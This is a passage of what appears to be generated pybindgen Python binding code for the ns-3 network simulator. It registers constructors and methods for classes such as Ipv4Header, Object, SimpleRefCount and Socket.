    ## header.h (module 'network'): ns3::Header::Header(ns3::Header const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Header const &', 'arg0')])
    ## header.h (module 'network'): uint32_t ns3::Header::Deserialize(ns3::Buffer::Iterator start) [member function]
    cls.add_method('Deserialize',
                   'uint32_t',
                   [param('ns3::Buffer::Iterator', 'start')],
                   is_pure_virtual=True, is_virtual=True)
    ## header.h (module 'network'): uint32_t ns3::Header::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize',
                   'uint32_t',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## header.h (module 'network'): static ns3::TypeId ns3::Header::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## header.h (module 'network'): void ns3::Header::Print(std::ostream & os) const [member function]
    cls.add_method('Print',
                   'void',
                   [param('std::ostream &', 'os')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## header.h (module 'network'): void ns3::Header::Serialize(ns3::Buffer::Iterator start) const [member function]
    cls.add_method('Serialize',
                   'void',
                   [param('ns3::Buffer::Iterator', 'start')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    return
def register_Ns3Ipv4Header_methods(root_module, cls):
    """Register the concrete ns3::Ipv4Header class on ``cls``.

    Adds the constructors, the virtual Header-interface overrides
    (Deserialize/GetSerializedSize/Print/Serialize/GetInstanceTypeId), and
    all IPv4-header field accessors and mutators (source/destination,
    DSCP/ECN, fragmentation flags and offset, identification, payload size,
    protocol, TOS, TTL, checksum handling).
    """
    ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::Ipv4Header(ns3::Ipv4Header const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Ipv4Header const &', 'arg0')])
    ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::Ipv4Header() [constructor]
    cls.add_constructor([])
    ## ipv4-header.h (module 'internet'): uint32_t ns3::Ipv4Header::Deserialize(ns3::Buffer::Iterator start) [member function]
    cls.add_method('Deserialize',
                   'uint32_t',
                   [param('ns3::Buffer::Iterator', 'start')],
                   is_virtual=True)
    ## ipv4-header.h (module 'internet'): std::string ns3::Ipv4Header::DscpTypeToString(ns3::Ipv4Header::DscpType dscp) const [member function]
    cls.add_method('DscpTypeToString',
                   'std::string',
                   [param('ns3::Ipv4Header::DscpType', 'dscp')],
                   is_const=True)
    ## ipv4-header.h (module 'internet'): std::string ns3::Ipv4Header::EcnTypeToString(ns3::Ipv4Header::EcnType ecn) const [member function]
    cls.add_method('EcnTypeToString',
                   'std::string',
                   [param('ns3::Ipv4Header::EcnType', 'ecn')],
                   is_const=True)
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::EnableChecksum() [member function]
    cls.add_method('EnableChecksum',
                   'void',
                   [])
    ## ipv4-header.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Header::GetDestination() const [member function]
    cls.add_method('GetDestination',
                   'ns3::Ipv4Address',
                   [],
                   is_const=True)
    ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::DscpType ns3::Ipv4Header::GetDscp() const [member function]
    cls.add_method('GetDscp',
                   'ns3::Ipv4Header::DscpType',
                   [],
                   is_const=True)
    ## ipv4-header.h (module 'internet'): ns3::Ipv4Header::EcnType ns3::Ipv4Header::GetEcn() const [member function]
    cls.add_method('GetEcn',
                   'ns3::Ipv4Header::EcnType',
                   [],
                   is_const=True)
    ## ipv4-header.h (module 'internet'): uint16_t ns3::Ipv4Header::GetFragmentOffset() const [member function]
    cls.add_method('GetFragmentOffset',
                   'uint16_t',
                   [],
                   is_const=True)
    ## ipv4-header.h (module 'internet'): uint16_t ns3::Ipv4Header::GetIdentification() const [member function]
    cls.add_method('GetIdentification',
                   'uint16_t',
                   [],
                   is_const=True)
    ## ipv4-header.h (module 'internet'): ns3::TypeId ns3::Ipv4Header::GetInstanceTypeId() const [member function]
    cls.add_method('GetInstanceTypeId',
                   'ns3::TypeId',
                   [],
                   is_const=True, is_virtual=True)
    ## ipv4-header.h (module 'internet'): uint16_t ns3::Ipv4Header::GetPayloadSize() const [member function]
    cls.add_method('GetPayloadSize',
                   'uint16_t',
                   [],
                   is_const=True)
    ## ipv4-header.h (module 'internet'): uint8_t ns3::Ipv4Header::GetProtocol() const [member function]
    cls.add_method('GetProtocol',
                   'uint8_t',
                   [],
                   is_const=True)
    ## ipv4-header.h (module 'internet'): uint32_t ns3::Ipv4Header::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize',
                   'uint32_t',
                   [],
                   is_const=True, is_virtual=True)
    ## ipv4-header.h (module 'internet'): ns3::Ipv4Address ns3::Ipv4Header::GetSource() const [member function]
    cls.add_method('GetSource',
                   'ns3::Ipv4Address',
                   [],
                   is_const=True)
    ## ipv4-header.h (module 'internet'): uint8_t ns3::Ipv4Header::GetTos() const [member function]
    cls.add_method('GetTos',
                   'uint8_t',
                   [],
                   is_const=True)
    ## ipv4-header.h (module 'internet'): uint8_t ns3::Ipv4Header::GetTtl() const [member function]
    cls.add_method('GetTtl',
                   'uint8_t',
                   [],
                   is_const=True)
    ## ipv4-header.h (module 'internet'): static ns3::TypeId ns3::Ipv4Header::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## ipv4-header.h (module 'internet'): bool ns3::Ipv4Header::IsChecksumOk() const [member function]
    cls.add_method('IsChecksumOk',
                   'bool',
                   [],
                   is_const=True)
    ## ipv4-header.h (module 'internet'): bool ns3::Ipv4Header::IsDontFragment() const [member function]
    cls.add_method('IsDontFragment',
                   'bool',
                   [],
                   is_const=True)
    ## ipv4-header.h (module 'internet'): bool ns3::Ipv4Header::IsLastFragment() const [member function]
    cls.add_method('IsLastFragment',
                   'bool',
                   [],
                   is_const=True)
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::Print(std::ostream & os) const [member function]
    cls.add_method('Print',
                   'void',
                   [param('std::ostream &', 'os')],
                   is_const=True, is_virtual=True)
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::Serialize(ns3::Buffer::Iterator start) const [member function]
    cls.add_method('Serialize',
                   'void',
                   [param('ns3::Buffer::Iterator', 'start')],
                   is_const=True, is_virtual=True)
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetDestination(ns3::Ipv4Address destination) [member function]
    cls.add_method('SetDestination',
                   'void',
                   [param('ns3::Ipv4Address', 'destination')])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetDontFragment() [member function]
    cls.add_method('SetDontFragment',
                   'void',
                   [])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetDscp(ns3::Ipv4Header::DscpType dscp) [member function]
    cls.add_method('SetDscp',
                   'void',
                   [param('ns3::Ipv4Header::DscpType', 'dscp')])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetEcn(ns3::Ipv4Header::EcnType ecn) [member function]
    cls.add_method('SetEcn',
                   'void',
                   [param('ns3::Ipv4Header::EcnType', 'ecn')])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetFragmentOffset(uint16_t offsetBytes) [member function]
    cls.add_method('SetFragmentOffset',
                   'void',
                   [param('uint16_t', 'offsetBytes')])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetIdentification(uint16_t identification) [member function]
    cls.add_method('SetIdentification',
                   'void',
                   [param('uint16_t', 'identification')])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetLastFragment() [member function]
    cls.add_method('SetLastFragment',
                   'void',
                   [])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetMayFragment() [member function]
    cls.add_method('SetMayFragment',
                   'void',
                   [])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetMoreFragments() [member function]
    cls.add_method('SetMoreFragments',
                   'void',
                   [])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetPayloadSize(uint16_t size) [member function]
    cls.add_method('SetPayloadSize',
                   'void',
                   [param('uint16_t', 'size')])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetProtocol(uint8_t num) [member function]
    cls.add_method('SetProtocol',
                   'void',
                   [param('uint8_t', 'num')])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetSource(ns3::Ipv4Address source) [member function]
    cls.add_method('SetSource',
                   'void',
                   [param('ns3::Ipv4Address', 'source')])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetTos(uint8_t tos) [member function]
    cls.add_method('SetTos',
                   'void',
                   [param('uint8_t', 'tos')])
    ## ipv4-header.h (module 'internet'): void ns3::Ipv4Header::SetTtl(uint8_t ttl) [member function]
    cls.add_method('SetTtl',
                   'void',
                   [param('uint8_t', 'ttl')])
    return
def register_Ns3Object_methods(root_module, cls):
    """Register the ns3::Object base class on ``cls``.

    Adds the public lifecycle/aggregation API (AggregateObject, Dispose,
    Start, GetAggregateIterator, type-id accessors) and the protected
    copy constructor and virtual hooks (DoDispose, DoStart,
    NotifyNewAggregate) with visibility='protected'.
    """
    ## object.h (module 'core'): ns3::Object::Object() [constructor]
    cls.add_constructor([])
    ## object.h (module 'core'): void ns3::Object::AggregateObject(ns3::Ptr<ns3::Object> other) [member function]
    cls.add_method('AggregateObject',
                   'void',
                   [param('ns3::Ptr< ns3::Object >', 'other')])
    ## object.h (module 'core'): void ns3::Object::Dispose() [member function]
    cls.add_method('Dispose',
                   'void',
                   [])
    ## object.h (module 'core'): ns3::Object::AggregateIterator ns3::Object::GetAggregateIterator() const [member function]
    cls.add_method('GetAggregateIterator',
                   'ns3::Object::AggregateIterator',
                   [],
                   is_const=True)
    ## object.h (module 'core'): ns3::TypeId ns3::Object::GetInstanceTypeId() const [member function]
    cls.add_method('GetInstanceTypeId',
                   'ns3::TypeId',
                   [],
                   is_const=True, is_virtual=True)
    ## object.h (module 'core'): static ns3::TypeId ns3::Object::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## object.h (module 'core'): void ns3::Object::Start() [member function]
    cls.add_method('Start',
                   'void',
                   [])
    ## object.h (module 'core'): ns3::Object::Object(ns3::Object const & o) [copy constructor]
    cls.add_constructor([param('ns3::Object const &', 'o')],
                        visibility='protected')
    ## object.h (module 'core'): void ns3::Object::DoDispose() [member function]
    cls.add_method('DoDispose',
                   'void',
                   [],
                   visibility='protected', is_virtual=True)
    ## object.h (module 'core'): void ns3::Object::DoStart() [member function]
    cls.add_method('DoStart',
                   'void',
                   [],
                   visibility='protected', is_virtual=True)
    ## object.h (module 'core'): void ns3::Object::NotifyNewAggregate() [member function]
    cls.add_method('NotifyNewAggregate',
                   'void',
                   [],
                   visibility='protected', is_virtual=True)
    return
def register_Ns3ObjectAggregateIterator_methods(root_module, cls):
    """Register the ns3::Object::AggregateIterator nested class on ``cls``.

    Adds the constructors plus the HasNext/Next iteration pair over an
    Object's aggregated objects.
    """
    ## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator(ns3::Object::AggregateIterator const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::Object::AggregateIterator const &', 'arg0')])
    ## object.h (module 'core'): ns3::Object::AggregateIterator::AggregateIterator() [constructor]
    cls.add_constructor([])
    ## object.h (module 'core'): bool ns3::Object::AggregateIterator::HasNext() const [member function]
    cls.add_method('HasNext',
                   'bool',
                   [],
                   is_const=True)
    ## object.h (module 'core'): ns3::Ptr<ns3::Object const> ns3::Object::AggregateIterator::Next() [member function]
    cls.add_method('Next',
                   'ns3::Ptr< ns3::Object const >',
                   [])
    return
def register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, cls):
    """Register the SimpleRefCount<AttributeAccessor, ...> instantiation.

    Adds the default/copy constructors and the static Cleanup() for this
    reference-counting base-class template instantiation.
    """
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount() [constructor]
    cls.add_constructor([])
    ## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::SimpleRefCount(ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > const & o) [copy constructor]
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter< ns3::AttributeAccessor > > const &', 'o')])
    ## simple-ref-count.h (module 'core'): static void ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >::Cleanup() [member function]
    cls.add_method('Cleanup',
                   'void',
                   [],
                   is_static=True)
    return
def register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, cls):
    """Register bindings for ns3::SimpleRefCount<ns3::AttributeChecker> (simple-ref-count.h, module 'core')."""
    # Default constructor.
    cls.add_constructor([])
    # Copy constructor.
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter< ns3::AttributeChecker > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return
def register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, cls):
    """Register bindings for ns3::SimpleRefCount<ns3::AttributeValue> (simple-ref-count.h, module 'core')."""
    # Default constructor.
    cls.add_constructor([])
    # Copy constructor.
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter< ns3::AttributeValue > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return
def register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, cls):
    """Register bindings for ns3::SimpleRefCount<ns3::CallbackImplBase> (simple-ref-count.h, module 'core')."""
    # Default constructor.
    cls.add_constructor([])
    # Copy constructor.
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter< ns3::CallbackImplBase > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return
def register_Ns3SimpleRefCount__Ns3EventImpl_Ns3Empty_Ns3DefaultDeleter__lt__ns3EventImpl__gt___methods(root_module, cls):
    """Register bindings for ns3::SimpleRefCount<ns3::EventImpl> (simple-ref-count.h, module 'core')."""
    # Default constructor.
    cls.add_constructor([])
    # Copy constructor.
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::EventImpl, ns3::empty, ns3::DefaultDeleter< ns3::EventImpl > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return
def register_Ns3SimpleRefCount__Ns3Ipv4MulticastRoute_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4MulticastRoute__gt___methods(root_module, cls):
    """Register bindings for ns3::SimpleRefCount<ns3::Ipv4MulticastRoute> (simple-ref-count.h, module 'core')."""
    # Default constructor.
    cls.add_constructor([])
    # Copy constructor.
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::Ipv4MulticastRoute, ns3::empty, ns3::DefaultDeleter< ns3::Ipv4MulticastRoute > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return
def register_Ns3SimpleRefCount__Ns3Ipv4Route_Ns3Empty_Ns3DefaultDeleter__lt__ns3Ipv4Route__gt___methods(root_module, cls):
    """Register bindings for ns3::SimpleRefCount<ns3::Ipv4Route> (simple-ref-count.h, module 'core')."""
    # Default constructor.
    cls.add_constructor([])
    # Copy constructor.
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::Ipv4Route, ns3::empty, ns3::DefaultDeleter< ns3::Ipv4Route > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return
def register_Ns3SimpleRefCount__Ns3NixVector_Ns3Empty_Ns3DefaultDeleter__lt__ns3NixVector__gt___methods(root_module, cls):
    """Register bindings for ns3::SimpleRefCount<ns3::NixVector> (simple-ref-count.h, module 'core')."""
    # Default constructor.
    cls.add_constructor([])
    # Copy constructor.
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::NixVector, ns3::empty, ns3::DefaultDeleter< ns3::NixVector > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return
def register_Ns3SimpleRefCount__Ns3OutputStreamWrapper_Ns3Empty_Ns3DefaultDeleter__lt__ns3OutputStreamWrapper__gt___methods(root_module, cls):
    """Register bindings for ns3::SimpleRefCount<ns3::OutputStreamWrapper> (simple-ref-count.h, module 'core')."""
    # Default constructor.
    cls.add_constructor([])
    # Copy constructor.
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::OutputStreamWrapper, ns3::empty, ns3::DefaultDeleter< ns3::OutputStreamWrapper > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return
def register_Ns3SimpleRefCount__Ns3Packet_Ns3Empty_Ns3DefaultDeleter__lt__ns3Packet__gt___methods(root_module, cls):
    """Register bindings for ns3::SimpleRefCount<ns3::Packet> (simple-ref-count.h, module 'core')."""
    # Default constructor.
    cls.add_constructor([])
    # Copy constructor.
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::Packet, ns3::empty, ns3::DefaultDeleter< ns3::Packet > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return
def register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, cls):
    """Register bindings for ns3::SimpleRefCount<ns3::TraceSourceAccessor> (simple-ref-count.h, module 'core')."""
    # Default constructor.
    cls.add_constructor([])
    # Copy constructor.
    cls.add_constructor([param('ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter< ns3::TraceSourceAccessor > > const &', 'o')])
    # static void Cleanup()
    cls.add_method('Cleanup', 'void', [], is_static=True)
    return
def register_Ns3Socket_methods(root_module, cls):
    """Register bindings for ns3::Socket (socket.h, module 'network')."""
    # Copy constructor and default constructor.
    cls.add_constructor([param('ns3::Socket const &', 'arg0')])
    cls.add_constructor([])
    # int Bind(ns3::Address const & address)  [pure virtual]
    cls.add_method('Bind', 'int', [param('ns3::Address const &', 'address')], is_pure_virtual=True, is_virtual=True)
    # int Bind()  [pure virtual]
    cls.add_method('Bind', 'int', [], is_pure_virtual=True, is_virtual=True)
    # void BindToNetDevice(ns3::Ptr<ns3::NetDevice> netdevice)  [virtual]
    cls.add_method('BindToNetDevice', 'void', [param('ns3::Ptr< ns3::NetDevice >', 'netdevice')], is_virtual=True)
    # int Close()  [pure virtual]
    cls.add_method('Close', 'int', [], is_pure_virtual=True, is_virtual=True)
    # int Connect(ns3::Address const & address)  [pure virtual]
    cls.add_method('Connect', 'int', [param('ns3::Address const &', 'address')], is_pure_virtual=True, is_virtual=True)
    # static ns3::Ptr<ns3::Socket> CreateSocket(node, tid)
    cls.add_method('CreateSocket', 'ns3::Ptr< ns3::Socket >', [param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::TypeId', 'tid')], is_static=True)
    # bool GetAllowBroadcast() const  [pure virtual]
    cls.add_method('GetAllowBroadcast', 'bool', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    # ns3::Ptr<ns3::NetDevice> GetBoundNetDevice()
    cls.add_method('GetBoundNetDevice', 'ns3::Ptr< ns3::NetDevice >', [])
    # ns3::Socket::SocketErrno GetErrno() const  [pure virtual]
    cls.add_method('GetErrno', 'ns3::Socket::SocketErrno', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    # ns3::Ptr<ns3::Node> GetNode() const  [pure virtual]
    cls.add_method('GetNode', 'ns3::Ptr< ns3::Node >', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    # uint32_t GetRxAvailable() const  [pure virtual]
    cls.add_method('GetRxAvailable', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    # int GetSockName(ns3::Address & address) const  [pure virtual]
    cls.add_method('GetSockName', 'int', [param('ns3::Address &', 'address')], is_pure_virtual=True, is_const=True, is_virtual=True)
    # ns3::Socket::SocketType GetSocketType() const  [pure virtual]
    cls.add_method('GetSocketType', 'ns3::Socket::SocketType', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    # uint32_t GetTxAvailable() const  [pure virtual]
    cls.add_method('GetTxAvailable', 'uint32_t', [], is_pure_virtual=True, is_const=True, is_virtual=True)
    # int Listen()  [pure virtual]
    cls.add_method('Listen', 'int', [], is_pure_virtual=True, is_virtual=True)
    # Recv overloads: (maxSize, flags), (), (buf, size, flags).
    cls.add_method('Recv', 'ns3::Ptr< ns3::Packet >', [param('uint32_t', 'maxSize'), param('uint32_t', 'flags')], is_pure_virtual=True, is_virtual=True)
    cls.add_method('Recv', 'ns3::Ptr< ns3::Packet >', [])
    cls.add_method('Recv', 'int', [param('uint8_t *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags')])
    # RecvFrom overloads.
    cls.add_method('RecvFrom', 'ns3::Ptr< ns3::Packet >', [param('uint32_t', 'maxSize'), param('uint32_t', 'flags'), param('ns3::Address &', 'fromAddress')], is_pure_virtual=True, is_virtual=True)
    cls.add_method('RecvFrom', 'ns3::Ptr< ns3::Packet >', [param('ns3::Address &', 'fromAddress')])
    cls.add_method('RecvFrom', 'int', [param('uint8_t *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags'), param('ns3::Address &', 'fromAddress')])
    # Send overloads.
    cls.add_method('Send', 'int', [param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags')], is_pure_virtual=True, is_virtual=True)
    cls.add_method('Send', 'int', [param('ns3::Ptr< ns3::Packet >', 'p')])
    cls.add_method('Send', 'int', [param('uint8_t const *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags')])
    # SendTo overloads.
    cls.add_method('SendTo', 'int', [param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags'), param('ns3::Address const &', 'toAddress')], is_pure_virtual=True, is_virtual=True)
    cls.add_method('SendTo', 'int', [param('uint8_t const *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags'), param('ns3::Address const &', 'address')])
    # void SetAcceptCallback(connectionRequest, newConnectionCreated)
    cls.add_method('SetAcceptCallback', 'void', [param('ns3::Callback< bool, ns3::Ptr< ns3::Socket >, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionRequest'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'newConnectionCreated')])
    # bool SetAllowBroadcast(bool allowBroadcast)  [pure virtual]
    cls.add_method('SetAllowBroadcast', 'bool', [param('bool', 'allowBroadcast')], is_pure_virtual=True, is_virtual=True)
    # void SetCloseCallbacks(normalClose, errorClose)
    cls.add_method('SetCloseCallbacks', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'normalClose'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'errorClose')])
    # void SetConnectCallback(connectionSucceeded, connectionFailed)
    cls.add_method('SetConnectCallback', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionSucceeded'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionFailed')])
    # void SetDataSentCallback(dataSent)
    cls.add_method('SetDataSentCallback', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'dataSent')])
    # void SetRecvCallback(arg0)
    cls.add_method('SetRecvCallback', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'arg0')])
    # void SetRecvPktInfo(bool flag)
    cls.add_method('SetRecvPktInfo', 'void', [param('bool', 'flag')])
    # void SetSendCallback(sendCb)
    cls.add_method('SetSendCallback', 'void', [param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'sendCb')])
    # int ShutdownRecv() / int ShutdownSend()  [pure virtual]
    cls.add_method('ShutdownRecv', 'int', [], is_pure_virtual=True, is_virtual=True)
    cls.add_method('ShutdownSend', 'int', [], is_pure_virtual=True, is_virtual=True)
    # void DoDispose()  [protected virtual]
    cls.add_method('DoDispose', 'void', [], visibility='protected', is_virtual=True)
    # Protected Notify* helpers invoked by subclasses.
    cls.add_method('NotifyConnectionFailed', 'void', [], visibility='protected')
    cls.add_method('NotifyConnectionRequest', 'bool', [param('ns3::Address const &', 'from')], visibility='protected')
    cls.add_method('NotifyConnectionSucceeded', 'void', [], visibility='protected')
    cls.add_method('NotifyDataRecv', 'void', [], visibility='protected')
    cls.add_method('NotifyDataSent', 'void', [param('uint32_t', 'size')], visibility='protected')
    cls.add_method('NotifyErrorClose', 'void', [], visibility='protected')
    cls.add_method('NotifyNewConnectionCreated', 'void', [param('ns3::Ptr< ns3::Socket >', 'socket'), param('ns3::Address const &', 'from')], visibility='protected')
    cls.add_method('NotifyNormalClose', 'void', [], visibility='protected')
    cls.add_method('NotifySend', 'void', [param('uint32_t', 'spaceAvailable')], visibility='protected')
    return
def register_Ns3SocketAddressTag_methods(root_module, cls):
    """Register bindings for ns3::SocketAddressTag (socket.h, module 'network')."""
    # Copy constructor and default constructor.
    cls.add_constructor([param('ns3::SocketAddressTag const &', 'arg0')])
    cls.add_constructor([])
    # void Deserialize(ns3::TagBuffer i)  [virtual]
    cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'i')], is_virtual=True)
    # ns3::Address GetAddress() const
    cls.add_method('GetAddress', 'ns3::Address', [], is_const=True)
    # ns3::TypeId GetInstanceTypeId() const  [virtual]
    cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True)
    # uint32_t GetSerializedSize() const  [virtual]
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True)
    # static ns3::TypeId GetTypeId()
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    # void Print(std::ostream & os) const  [virtual]
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True)
    # void Serialize(ns3::TagBuffer i) const  [virtual]
    cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'i')], is_const=True, is_virtual=True)
    # void SetAddress(ns3::Address addr)
    cls.add_method('SetAddress', 'void', [param('ns3::Address', 'addr')])
    return
def register_Ns3SocketIpTtlTag_methods(root_module, cls):
    """Register bindings for ns3::SocketIpTtlTag (socket.h, module 'network')."""
    # Copy constructor and default constructor.
    cls.add_constructor([param('ns3::SocketIpTtlTag const &', 'arg0')])
    cls.add_constructor([])
    # void Deserialize(ns3::TagBuffer i)  [virtual]
    cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'i')], is_virtual=True)
    # ns3::TypeId GetInstanceTypeId() const  [virtual]
    cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True)
    # uint32_t GetSerializedSize() const  [virtual]
    cls.add_method('GetSerializedSize', 'uint32_t', [], is_const=True, is_virtual=True)
    # uint8_t GetTtl() const
    cls.add_method('GetTtl', 'uint8_t', [], is_const=True)
    # static ns3::TypeId GetTypeId()
    cls.add_method('GetTypeId', 'ns3::TypeId', [], is_static=True)
    # void Print(std::ostream & os) const  [virtual]
    cls.add_method('Print', 'void', [param('std::ostream &', 'os')], is_const=True, is_virtual=True)
    # void Serialize(ns3::TagBuffer i) const  [virtual]
    cls.add_method('Serialize', 'void', [param('ns3::TagBuffer', 'i')], is_const=True, is_virtual=True)
    # void SetTtl(uint8_t ttl)
    cls.add_method('SetTtl', 'void', [param('uint8_t', 'ttl')])
    return
def register_Ns3SocketSetDontFragmentTag_methods(root_module, cls):
    """Register bindings for ns3::SocketSetDontFragmentTag (socket.h, module 'network')."""
    # Copy constructor and default constructor.
    cls.add_constructor([param('ns3::SocketSetDontFragmentTag const &', 'arg0')])
    cls.add_constructor([])
    # void Deserialize(ns3::TagBuffer i)  [virtual]
    cls.add_method('Deserialize', 'void', [param('ns3::TagBuffer', 'i')], is_virtual=True)
    # void Disable() / void Enable()
    cls.add_method('Disable', 'void', [])
    cls.add_method('Enable', 'void', [])
    # ns3::TypeId GetInstanceTypeId() const  [virtual]
    cls.add_method('GetInstanceTypeId', 'ns3::TypeId', [], is_const=True, is_virtual=True)
    # uint32_t GetSerializedSize() const  [virtual]
